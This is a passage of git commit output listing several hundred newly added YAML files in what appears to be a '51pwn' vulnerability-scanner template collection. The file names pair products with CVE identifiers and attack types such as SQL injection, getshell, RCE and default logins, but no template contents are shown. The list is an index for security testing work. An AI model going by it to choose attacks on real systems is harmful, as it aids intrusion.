mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-register_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-report_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-reserve_username_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-search_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-service_fee_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shipping_address_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shop_cat_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shop_consult_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shop_domin_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shop_earnest_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shop_grade_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-shop_template_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-smarty_config_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-space_product_detail_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-space_product_detail_uid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-spec_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-sub_site_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-tg_member_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-ucomment_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-user_order_username-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-user_read_rec_username-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-wap_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder714-getshell.yaml create mode 100755 config/51pwn/yaml/MantisBT/CVE-2017-7615.yaml create mode 100755 config/51pwn/yaml/Mara CMS/CVE-2020-24223.yaml create mode 100755 config/51pwn/yaml/MaxSite CMS/CVE-2021-35265.yaml create mode 100755 config/51pwn/yaml/McAfee ePolicy Orchistrator/CVE-2020-7318.yaml create mode 100755 config/51pwn/yaml/Mercusys Mercury X18G/CVE-2021-23241.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/CNVD-2018-13393.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/CVE-2019-16996.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/CVE-2019-16997.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/CVE-2019-17418.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-Front-Getshell.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_1_7-LFI.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_1_7_job_php-BindSQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_1_FileUpload-Getshell.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_2_12-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_2_thumb_php-FileRead.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_3_12_metv5_top_php-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_3_1_func_php-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_3_1_news_php-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_3_search-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_3_search_php-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V5_3_x_uidata_php-Config.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V6_0_0-FileRead.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V6_0_0_old_thumb_class_php-FileRead.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V6_0_0_thumb_php-FileRead.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-V6_1_0-phpinfo.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-img_php-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-login_check-SQLi.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/Metinfo-v6_2_0_admin_index_php-UploadGetShell.yaml create mode 100755 config/51pwn/yaml/MetInfo CMS/metinfo-lfi.yaml create mode 100755 config/51pwn/yaml/Metadata Service/metadata-service-alibaba.yaml create mode 100755 config/51pwn/yaml/Microsoft Azure/CVE-2021-38647.yaml create mode 100755 config/51pwn/yaml/Microsoft SharePoint/CVE-2020-16952.yaml create mode 100755 config/51pwn/yaml/Microstrategy Web/CVE-2018-18775.yaml create mode 100755 config/51pwn/yaml/Microstrategy Web/CVE-2018-18777.yaml create mode 100755 config/51pwn/yaml/Mida eFramework/CVE-2020-15920.yaml create mode 100755 config/51pwn/yaml/MinIO/CVE-2021-21287.yaml create mode 100755 config/51pwn/yaml/MinIO/CVE-2021-41266.yaml create mode 100755 config/51pwn/yaml/MinIO/minio-default-login.yaml create mode 100755 config/51pwn/yaml/Mirasys DVMS Worlstation/CVE-2018-8727.yaml create mode 100755 config/51pwn/yaml/Mobile Viewpoint Wireless Multiplex Terminal/CVE-2020-35338.yaml create mode 100755 config/51pwn/yaml/MobileIron Sentry/CVE-2020-15505.yaml create mode 100755 config/51pwn/yaml/MongoDB/CNVD-2020-26593.yaml create mode 100755 config/51pwn/yaml/MongoDB/CVE-2019-10758.yaml create mode 100755 config/51pwn/yaml/MongoDB/CVE-2020-24391.yaml create mode 100755 config/51pwn/yaml/MongoDB/mongodb-unauth.yaml create mode 100755 config/51pwn/yaml/Monitorr/CVE-2020-28871.yaml create mode 100755 config/51pwn/yaml/Motorola SURFBoard cable modem SBV6120E/CVE-2010-2307.yaml create mode 100755 config/51pwn/yaml/Msvod/CVE-2018-14418.yaml create mode 100755 config/51pwn/yaml/MySQLDumper/CVE-2012-4253.yaml create mode 100755 config/51pwn/yaml/MyuCms/myucms-lfr.yaml create mode 100755 config/51pwn/yaml/NBR-NPE/ruijie-unauthorized-cookie.yaml create mode 100755 config/51pwn/yaml/NBR-NPE/wooyun-2015-0123851.yaml create mode 100755 config/51pwn/yaml/NCBI ToolBox/CVE-2018-16716.yaml create mode 100755 config/51pwn/yaml/NComputing vSpace Pro/CVE-2018-10201.yaml create mode 100755 config/51pwn/yaml/NETGEAR DGN2200/CVE-2016-5649.yaml create mode 100755 config/51pwn/yaml/NETGEAR JGS516PE/CVE-2020-26919.yaml create mode 100755 config/51pwn/yaml/NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000/CVE-2017-5521.yaml create mode 100755 config/51pwn/yaml/NETGEAR WAC124/netgear-wac124-router-auth-bypass.yaml create mode 100755 config/51pwn/yaml/NETGEAR WN604/CVE-2016-1555.yaml create mode 100755 config/51pwn/yaml/NETGEAR routers (including R6400, R7000, R8000 and similar)/CVE-2016-6277.yaml create mode 100755 "config/51pwn/yaml/NETGEAR \346\227\240\347\272\277\350\267\257\347\224\261\345\231\250/CVE-2020-27866.yaml" create mode 100755 "config/51pwn/yaml/NETGEAR \346\227\240\347\272\277\350\267\257\347\224\261\345\231\250/netgear-router-exposure.yaml" create mode 100755 "config/51pwn/yaml/NPM\345\214\205/CVE-2021-3377.yaml" create mode 100755 config/51pwn/yaml/NPS/nps-default-login.yaml create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/nsasg-arbitrary-file-read.yaml" create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/wamgkang-unauthorized-export_log.yaml" create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/wangkang_NS_ASG-sqli-menu.yaml" create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/wooyun-2014-058925.yaml" create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/wooyun-2014-058932.yaml" create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/wooyun-2014-058987.yaml" create mode 100755 "config/51pwn/yaml/NS-ASG\345\256\211\345\205\250\347\275\221\345\205\263/wooyun-2015-097832.yaml" create mode 100755 config/51pwn/yaml/NVRmini2/nuuo-file-inclusion.yaml create mode 100755 config/51pwn/yaml/NVRmini2/nuuo-nvrmini2-upgradehandlephp-rce.yaml create mode 100755 config/51pwn/yaml/Nagios XI/CVE-2018-10735.yaml create mode 100755 config/51pwn/yaml/Nagios XI/CVE-2018-10736.yaml create mode 100755 config/51pwn/yaml/Nagios XI/CVE-2018-10737.yaml create mode 100755 config/51pwn/yaml/Nagios XI/CVE-2018-10738.yaml create mode 100755 config/51pwn/yaml/Nagios/nagios-default-login.yaml create mode 100755 "config/51pwn/yaml/NatShell\350\223\235\346\265\267\345\215\223\350\266\212\350\256\244\350\257\201\350\256\241\350\264\271\347\263\273\347\273\237/natshell-path-traversal.yaml" create mode 100755 "config/51pwn/yaml/NatShell\350\223\235\346\265\267\345\215\223\350\266\212\350\256\244\350\257\201\350\256\241\350\264\271\347\263\273\347\273\237/natshell-rce.yaml" create mode 100755 config/51pwn/yaml/NateMail/CVE-2019-13392.yaml create mode 100755 config/51pwn/yaml/NeDi Consulting NeDi/CVE-2020-14413.yaml create mode 100755 config/51pwn/yaml/Netgear RAX43/CVE-2021-20167.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9606.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9607.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9608.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9609.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9614.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9615.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9617.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2014-9618.yaml create mode 100755 config/51pwn/yaml/Netsweeper/CVE-2020-13167.yaml create mode 100755 config/51pwn/yaml/Nette/CVE-2020-15227.yaml create mode 100755 config/51pwn/yaml/Networks Switch /ruijie-nbr1300g-exposure.yaml create mode 100755 config/51pwn/yaml/Networks Switch /ruijie-networks-lfi.yaml create mode 100755 config/51pwn/yaml/Nexus/CVE-2019-7238.yaml create mode 100755 config/51pwn/yaml/Nexus/CVE-2020-10199.yaml create mode 100755 config/51pwn/yaml/Nexus/CVE-2020-10204.yaml create mode 100755 config/51pwn/yaml/Nexus/nexus-default-login.yaml create mode 100755 config/51pwn/yaml/NexusDB/CVE-2020-24571.yaml create mode 100755 config/51pwn/yaml/Nimble Streamer/CVE-2019-11013.yaml create mode 100755 config/51pwn/yaml/Node-RED/CVE-2021-25864.yaml create mode 100755 config/51pwn/yaml/Node-RED/CVE-2021-3223.yaml create mode 100755 "config/51pwn/yaml/Nordex NC2\357\274\210Nordex Control 2\357\274\211/CVE-2015-6477.yaml" create mode 100755 config/51pwn/yaml/Npm netmask/CVE-2021-28918.yaml create mode 100755 config/51pwn/yaml/Nuxeo/CVE-2018-16341.yaml create mode 100755 config/51pwn/yaml/OECMS/CVE-2018-12095.yaml create mode 100755 config/51pwn/yaml/ONKYO Onkyo TX-NR585/CVE-2020-12447.yaml create mode 100755 config/51pwn/yaml/Odoo CMS/odoo-cms-redirect.yaml create mode 100755 config/51pwn/yaml/Odoo CMS/odoo-database-manager.yaml create mode 100755 config/51pwn/yaml/Open Solutions for Education openSIS/CVE-2020-6637.yaml create mode 100755 config/51pwn/yaml/Open-School/CVE-2019-14696.yaml create mode 100755 config/51pwn/yaml/OpenCart/CVE-2018-11231.yaml create mode 100755 config/51pwn/yaml/OpenEMR/CVE-2012-0991.yaml create mode 100755 config/51pwn/yaml/OpenSSH/CVE-2018-15473.yaml create mode 100755 config/51pwn/yaml/OpenStack/CVE-2021-3654.yaml create mode 100755 config/51pwn/yaml/OpenSymphony XWork/CVE-2007-4556.yaml create mode 100755 config/51pwn/yaml/OpenTSDB/CVE-2020-35476.yaml create mode 100755 config/51pwn/yaml/Openbsd Opensmtpd /CVE-2020-7247.yaml create mode 100755 config/51pwn/yaml/Openfire/CVE-2019-18393.yaml create mode 100755 config/51pwn/yaml/Openfire/CVE-2019-18394.yaml create mode 100755 config/51pwn/yaml/Openserver/CVE-2020-25495.yaml create mode 100755 config/51pwn/yaml/Operation Bridge Manager/CVE-2020-11853.yaml create mode 100755 config/51pwn/yaml/Optergy Proton/Enterprise/CVE-2019-7275.yaml create mode 100755 config/51pwn/yaml/Oracle E-Business Suite/CVE-2017-3528.yaml create mode 100755 config/51pwn/yaml/Oracle E-Business Suite/CVE-2018-3167.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2012-3153.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2017-10075.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2018-2791.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2018-3238.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2019-2578.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2019-2588.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2019-2616.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2019-2767.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2020-14864.yaml create mode 100755 config/51pwn/yaml/Oracle Fusion Middleware/CVE-2021-35587.yaml create mode 100755 config/51pwn/yaml/Oracle GlassFish Server/CVE-2013-3827.yaml create mode 100755 config/51pwn/yaml/Oracle GlassFish Server/CVE-2017-1000028.yaml create mode 100755 config/51pwn/yaml/Oracle GlassFish Server/CVE-2017-1000029.yaml create mode 100755 config/51pwn/yaml/Oracle Secure Global Desktop/CVE-2018-19439.yaml create mode 100755 config/51pwn/yaml/Oracle iPlanet Web Server/CVE-2020-9315.yaml create mode 100755 config/51pwn/yaml/Osclass/CVE-2014-6308.yaml create mode 100755 config/51pwn/yaml/PEGA pega infinity/CVE-2021-27651.yaml create mode 100755 config/51pwn/yaml/PHP-Fusion/CVE-2020-24949.yaml create mode 100755 config/51pwn/yaml/PHP-Proxy/CVE-2018-19458.yaml create mode 100755 config/51pwn/yaml/PHP/CVE-2012-1823.yaml create mode 100755 config/51pwn/yaml/PHPOK/PHPOK-SQLi.yaml create mode 100755 config/51pwn/yaml/PHPSHE/PHPSHE-SQLi.yaml create mode 100755 config/51pwn/yaml/PHPUnit/CVE-2017-9841.yaml create mode 100755 config/51pwn/yaml/PHPUnit/phpunit.yaml create mode 100755 config/51pwn/yaml/PHPmail/CVE-2016-10033.yaml create mode 100755 config/51pwn/yaml/PRTG Network Monitor/CVE-2020-11547.yaml create mode 100755 config/51pwn/yaml/Pallets Werkzeug/CVE-2019-14322.yaml create mode 100755 config/51pwn/yaml/Palo Alto Networks PAN-OS/CVE-2017-15944.yaml create mode 100755 config/51pwn/yaml/Palo Alto Networks PAN-OS/CVE-2018-10141.yaml create mode 100755 config/51pwn/yaml/Palo Alto Networks PAN-OS/CVE-2020-2036.yaml create mode 100755 "config/51pwn/yaml/Panabit-\346\231\272\350\203\275\347\275\221\345\205\263/panabit-default-login.yaml" create mode 100755 "config/51pwn/yaml/Panabit-\346\231\272\350\203\275\347\275\221\345\205\263/panabit-ixcache-default-login.yaml" create mode 100755 config/51pwn/yaml/PandoraFMS/CVE-2019-20224.yaml create mode 100755 config/51pwn/yaml/PbootCMS/Bootcms_v1-addform_fcode-sqli.yaml create mode 100755 config/51pwn/yaml/PbootCMS/Bootcms_v1-addmsg-sqli.yaml create mode 100755 config/51pwn/yaml/PbootCMS/Bootcms_v1-ext_price-sqli.yaml create mode 100755 config/51pwn/yaml/PbootCMS/Bootcms_v1-keyword-sqli.yaml create mode 100755 config/51pwn/yaml/PbootCMS/Bootcms_v1-search-sqli.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-About-CommandExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-CommandExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-Content-CommandExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-Index-CommandExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-List-CommandExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-ParserController-CodeExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCMS_v1-Search-CommandExecution.yaml create mode 100755 config/51pwn/yaml/PbootCMS/PbootCms-312-RCE.yaml create mode 100755 config/51pwn/yaml/PbootCMS/pbootcms-database-file-download.yaml create mode 100755 config/51pwn/yaml/PilusCart/CVE-2019-16123.yaml create mode 100755 config/51pwn/yaml/Planon/CVE-2018-18570.yaml create mode 100755 config/51pwn/yaml/Polaris FT Intellect Core Banking/CVE-2018-14931.yaml create mode 100755 config/51pwn/yaml/PowerCreatorCMS/powercreator-cms-rce.yaml create mode 100755 config/51pwn/yaml/PrestaShop/CVE-2021-36748.yaml create mode 100755 config/51pwn/yaml/PrestaShop/CVE-2021-37538.yaml create mode 100755 config/51pwn/yaml/Prisma Industriale Checkweigher PrismaWEB/CVE-2018-15535.yaml create mode 100755 config/51pwn/yaml/Prisma Industriale Checkweigher PrismaWEB/CVE-2018-9161.yaml create mode 100755 config/51pwn/yaml/ProcessWire CMS/CVE-2020-27467.yaml create mode 100755 config/51pwn/yaml/Prometheus/CVE-2021-29622.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-config.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-exporter.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-exposed-panel.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-flags.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-log.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-metrics.yaml create mode 100755 config/51pwn/yaml/Prometheus/prometheus-targets.yaml create mode 100755 config/51pwn/yaml/Pulse Secure /CVE-2019-11510.yaml create mode 100755 config/51pwn/yaml/Pulse Secure /pulse-secure-panel.yaml create mode 100755 config/51pwn/yaml/Puppet/CVE-2020-7943.yaml create mode 100755 config/51pwn/yaml/Pyspider/pyspider-unauthorized-access.yaml create mode 100755 config/51pwn/yaml/QCubed/CVE-2020-24912.yaml create mode 100755 config/51pwn/yaml/QNAP/CVE-2019-7192.yaml create mode 100755 config/51pwn/yaml/QSAN Storage Manager/CVE-2021-37216.yaml create mode 100755 config/51pwn/yaml/RG-UAC/CNVD-2021-14536.yaml create mode 100755 config/51pwn/yaml/RG-UAC/ruijie-password-leak.yaml create mode 100755 config/51pwn/yaml/RG-UAC/ruijie_RG_UAC-defaultUserpass.yaml create mode 100755 config/51pwn/yaml/RabbitMQ/rabbitmq-default-login.yaml create mode 100755 config/51pwn/yaml/Rails/CVE-2015-3224.yaml create mode 100755 config/51pwn/yaml/Rails/CVE-2018-3760.yaml create mode 100755 config/51pwn/yaml/Rails/CVE-2019-5418.yaml create mode 100755 config/51pwn/yaml/Rails/CVE-2020-8163.yaml create mode 100755 config/51pwn/yaml/Rails/CVE-2021-44528.yaml create mode 100755 config/51pwn/yaml/Rails/rails-database-config.yaml create mode 100755 config/51pwn/yaml/Rails/rails-secret-token-disclosure.yaml create mode 100755 config/51pwn/yaml/Rails/rails6-xss.yaml create mode 100755 config/51pwn/yaml/RainbowFish PacsOne Server/CVE-2020-29164.yaml create mode 100755 config/51pwn/yaml/Ranger/ranger-default-login.yaml create mode 100755 config/51pwn/yaml/RaspAP/CVE-2021-33357.yaml create mode 100755 config/51pwn/yaml/Redwood Report2Web/CVE-2021-26710.yaml create mode 100755 config/51pwn/yaml/Resin/resin-cnnvd-200705-315.yaml create mode 100755 config/51pwn/yaml/Resin/resin-inputfile-fileread.yaml create mode 100755 config/51pwn/yaml/Resin/resin-viewfile-lfr.yaml create mode 100755 config/51pwn/yaml/ResourceSpace/CVE-2015-3648.yaml create mode 100755 config/51pwn/yaml/ResourceSpace/CVE-2021-41951.yaml create mode 100755 config/51pwn/yaml/Responsive FileManager/CVE-2018-14728.yaml create mode 100755 config/51pwn/yaml/Revive Adserver/CVE-2020-8115.yaml create mode 100755 config/51pwn/yaml/Revive Adserver/CVE-2021-22873.yaml create mode 100755 config/51pwn/yaml/RockMongo/CVE-2013-5108.yaml create mode 100755 config/51pwn/yaml/RockMongo/rockmongo-default-login.yaml create mode 100755 config/51pwn/yaml/RocketChat/CVE-2020-28208.yaml create mode 100755 config/51pwn/yaml/Rstudio Shiny Server/CVE-2021-3374.yaml create mode 100755 config/51pwn/yaml/Rubedo/CVE-2018-16836.yaml create mode 100755 config/51pwn/yaml/Ruby/CVE-2021-33564.yaml create mode 100755 config/51pwn/yaml/Ruckus IoT Controller/CVE-2021-33221.yaml create mode 100755 config/51pwn/yaml/Rumpus FTP Web File Manager/CVE-2019-19368.yaml create mode 100755 config/51pwn/yaml/Ruoyi/CNVD-2021-01931.yaml create mode 100755 config/51pwn/yaml/SAP BusinessObjects Business Intelligence Platform/CVE-2020-6308.yaml create mode 100755 config/51pwn/yaml/SAP Internet Graphics Server/CVE-2018-2392.yaml create mode 100755 config/51pwn/yaml/SAP NetWeaver/CVE-2016-2389.yaml create mode 100755 config/51pwn/yaml/SAP NetWeaver/CVE-2017-12637.yaml create mode 100755 config/51pwn/yaml/SAP NetWeaver/CVE-2020-6287.yaml create mode 100755 config/51pwn/yaml/SAP Solution Manager/CVE-2020-6207.yaml create mode 100755 config/51pwn/yaml/SCIMono/CVE-2021-21479.yaml create mode 100755 config/51pwn/yaml/SEO Panel/CVE-2021-3002.yaml create mode 100755 config/51pwn/yaml/SIMATIC/CVE-2014-2908.yaml create mode 100755 config/51pwn/yaml/SPIP/CVE-2016-7981.yaml create mode 100755 config/51pwn/yaml/Sahi Pro/CVE-2018-20470.yaml create mode 100755 config/51pwn/yaml/SaltStack Salt/CVE-2020-16846.yaml create mode 100755 config/51pwn/yaml/SaltStack Salt/CVE-2021-25281.yaml create mode 100755 config/51pwn/yaml/Schools Alert Management Script/CVE-2018-12054.yaml create mode 100755 config/51pwn/yaml/Seagate NAS OS/CVE-2018-12300.yaml create mode 100755 config/51pwn/yaml/SearchBlox/CVE-2020-35580.yaml create mode 100755 config/51pwn/yaml/SecNet AC/secnet-ac-default-password.yaml create mode 100755 config/51pwn/yaml/Sensio Labs Symfony/CVE-2015-4050.yaml create mode 100755 "config/51pwn/yaml/Seowon Intech SLC-130\345\222\214SLR-120S/CVE-2020-17456.yaml" create mode 100755 config/51pwn/yaml/Sercomm AG Combo VD625 AGSOT/CVE-2021-27132.yaml create mode 100755 config/51pwn/yaml/ShowDoc/showdoc-default-login.yaml create mode 100755 config/51pwn/yaml/ShowDoc/showdoc-file-upload-rce.yaml create mode 100755 config/51pwn/yaml/Siteserver CMS/exploits-46259.yaml create mode 100755 config/51pwn/yaml/Siteserver CMS/exploits-46260-1.yaml create mode 100755 config/51pwn/yaml/Siteserver CMS/exploits-46260.yaml create mode 100755 "config/51pwn/yaml/Six Apart Movable Type\357\274\210MT\357\274\211/CVE-2021-20837.yaml" create mode 100755 config/51pwn/yaml/SkyWalking/CVE-2020-9483.yaml create mode 100755 "config/51pwn/yaml/Smart Update Manager\357\274\210SUM\357\274\211/CVE-2020-7136.yaml" create mode 100755 config/51pwn/yaml/Smartweb/CNVD-2020-56167.yaml create mode 100755 config/51pwn/yaml/Smartweb/CNVD-2021-17369.yaml create mode 100755 config/51pwn/yaml/SolarWinds/CVE-2018-19386.yaml create mode 100755 config/51pwn/yaml/SolarWinds/CVE-2020-10148.yaml create mode 100755 config/51pwn/yaml/SolarWinds/solarwinds-default-admin.yaml create mode 100755 config/51pwn/yaml/Solr/CVE-2017-12629.yaml create mode 100755 config/51pwn/yaml/Solr/CVE-2019-0193.yaml create mode 100755 config/51pwn/yaml/Solr/CVE-2019-17558.yaml create mode 100755 config/51pwn/yaml/Solr/CVE-2021-27905.yaml create mode 100755 config/51pwn/yaml/Solr/apache-solr-file-read.yaml create mode 100755 config/51pwn/yaml/Solr/apache-solr-log4j-rce.yaml create mode 100755 config/51pwn/yaml/Solr/solr-exposure.yaml create mode 100755 config/51pwn/yaml/SonarQube/CVE-2020-27986.yaml create mode 100755 config/51pwn/yaml/SonarQube/sonarqube-public-projects.yaml create mode 100755 config/51pwn/yaml/SonicOS/CVE-2021-20031.yaml create mode 100755 config/51pwn/yaml/SonicWall SSL/sonicwall-sslvpn-shellshock.yaml create mode 100755 config/51pwn/yaml/Sonicwall SMA100/CVE-2021-20038.yaml create mode 100755 config/51pwn/yaml/Sonicwall SRA 4600 VPN/CVE-2019-7481.yaml create mode 100755 config/51pwn/yaml/SourceBans/CVE-2015-8349.yaml create mode 100755 config/51pwn/yaml/Sourcecodester Car Rental Management System/CVE-2020-29227.yaml create mode 100755 config/51pwn/yaml/Spring Data/CVE-2018-1273.yaml create mode 100755 config/51pwn/yaml/Spring Data/exposed-alps-spring.yaml create mode 100755 config/51pwn/yaml/SpringBoot/SpringBoot-H2db-Rce.yaml create mode 100755 config/51pwn/yaml/SpringBoot/SpringBoot-Heapdump.yaml create mode 100755 config/51pwn/yaml/SpringBoot/SpringBoot-Metrics.yaml create mode 100755 config/51pwn/yaml/SpringBoot/Springboot-Httptrace.yaml create mode 100755 config/51pwn/yaml/SpringBoot/Springboot-Loggers.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-actuators-jolokia-xxe.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-autoconfig.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-beans.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-configprops.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-dump.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-env.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-gateway.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-health.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-info.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-mappings.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-threaddump.yaml create mode 100755 config/51pwn/yaml/SpringBoot/springboot-trace.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2019-3799.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2020-5405.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2020-5410.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2020-5412.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2021-22053.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2022-22947.yaml create mode 100755 config/51pwn/yaml/SpringCloud/CVE-2022-22963.yaml create mode 100755 config/51pwn/yaml/SpringMvc/CVE-2018-1271.yaml create mode 100755 config/51pwn/yaml/SquirrelMail/CVE-2002-1131.yaml create mode 100755 config/51pwn/yaml/SquirrelMail/CVE-2004-0519.yaml create mode 100755 config/51pwn/yaml/SquirrelMail/CVE-2006-2842.yaml create mode 100755 config/51pwn/yaml/Squirrelly/CVE-2021-32819.yaml create mode 100755 config/51pwn/yaml/Subversion ALM for the enterprise/CVE-2020-9344.yaml create mode 100755 config/51pwn/yaml/SugarCRM Enterprise/CVE-2019-14974.yaml create mode 100755 config/51pwn/yaml/SugarCRM/CVE-2018-5715.yaml create mode 100755 config/51pwn/yaml/Superset/CVE-2021-44451.yaml create mode 100755 config/51pwn/yaml/Supervisor/CVE-2017-11610.yaml create mode 100755 config/51pwn/yaml/Sysaid Technologies SysAid/CVE-2021-30049.yaml create mode 100755 config/51pwn/yaml/Sysaid Technologies SysAid/CVE-2021-31862.yaml create mode 100755 config/51pwn/yaml/TOS/CVE-2020-15568.yaml create mode 100755 config/51pwn/yaml/TOS/CVE-2022-24990.yaml create mode 100755 config/51pwn/yaml/TP-Link TL-WR840N/TP_Link-unauthorized_access-conf_bin.yaml create mode 100755 config/51pwn/yaml/TP-link_TD-8820/wooyun-2014-075723.yaml create mode 100755 config/51pwn/yaml/TPLINK AC1750/TPLINK_AC1750-login.yaml create mode 100755 config/51pwn/yaml/TPLink_TL-R600VPN/CVE-2018-3949.yaml create mode 100755 "config/51pwn/yaml/TPshop\345\274\200\346\272\220\345\225\206\345\237\216\347\263\273\347\273\237/TpShop-Sqli.yaml" create mode 100755 "config/51pwn/yaml/TPshop\345\274\200\346\272\220\345\225\206\345\237\216\347\263\273\347\273\237/tpshop-directory-traversal.yaml" create mode 100755 config/51pwn/yaml/TVT NVMS-1000/CVE-2019-20085.yaml create mode 100755 